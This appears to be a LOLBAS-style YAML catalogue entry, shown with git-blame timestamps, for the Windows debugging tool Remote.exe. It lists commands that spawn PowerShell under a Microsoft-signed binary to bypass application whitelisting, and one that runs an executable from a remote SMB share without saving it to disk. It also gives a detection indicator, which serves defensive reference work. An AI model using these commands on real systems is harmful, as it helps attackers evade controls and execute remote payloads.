2021-01-07 02:48:25 +01:00
|
|
|
---
|
|
|
|
|
Name: Remote.exe
|
2021-01-07 05:31:01 +01:00
|
|
|
Description: Debugging tool included with Windows Debugging Tools
|
2021-01-07 02:48:25 +01:00
|
|
|
Author: mr.d0x
|
|
|
|
|
Created: 1/6/2021
|
|
|
|
|
Commands:
|
|
|
|
|
- Command: Remote.exe /s "powershell.exe" anythinghere
|
|
|
|
|
Description: Spawns powershell as a child process of remote.exe
|
|
|
|
|
Usecase: Executes a process under a trusted Microsoft signed binary
|
|
|
|
|
Category: AWL Bypass
|
|
|
|
|
Privileges: User
|
|
|
|
|
MitreID:
|
|
|
|
|
MitreLink:
|
2021-01-07 05:31:01 +01:00
|
|
|
OperatingSystem:
|
2021-01-07 02:48:25 +01:00
|
|
|
- Command: Remote.exe /s "powershell.exe" anythinghere
|
|
|
|
|
Description: Spawns powershell as a child process of remote.exe
|
|
|
|
|
Usecase: Executes a process under a trusted Microsoft signed binary
|
|
|
|
|
Category: Execute
|
|
|
|
|
Privileges: User
|
|
|
|
|
MitreID:
|
|
|
|
|
MitreLink:
|
2021-01-07 05:31:01 +01:00
|
|
|
OperatingSystem:
|
2021-01-07 02:48:25 +01:00
|
|
|
- Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
|
|
|
|
|
Description: Run a remote file
|
2021-01-07 05:31:01 +01:00
|
|
|
Usecase: Executing a remote binary without saving file to disk
|
2021-01-07 02:48:25 +01:00
|
|
|
Category: Execute
|
|
|
|
|
Privileges: User
|
|
|
|
|
MitreID:
|
|
|
|
|
MitreLink:
|
2021-01-07 05:31:01 +01:00
|
|
|
OperatingSystem:
|
2021-01-07 02:48:25 +01:00
|
|
|
Full_Path:
|
|
|
|
|
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
|
|
|
|
|
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
|
|
|
|
|
Code_Sample:
|
|
|
|
|
- Code:
|
|
|
|
|
Detection:
|
|
|
|
|
- IOC: remote.exe spawned
|
|
|
|
|
Resources:
|
|
|
|
|
- Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/
|
|
|
|
|
Acknowledgement:
|
|
|
|
|
- Person: mr.d0x
|
|
|
|
|
Handle: '@mrd0x'
|
2021-01-07 05:31:01 +01:00
|
|
|
---
|
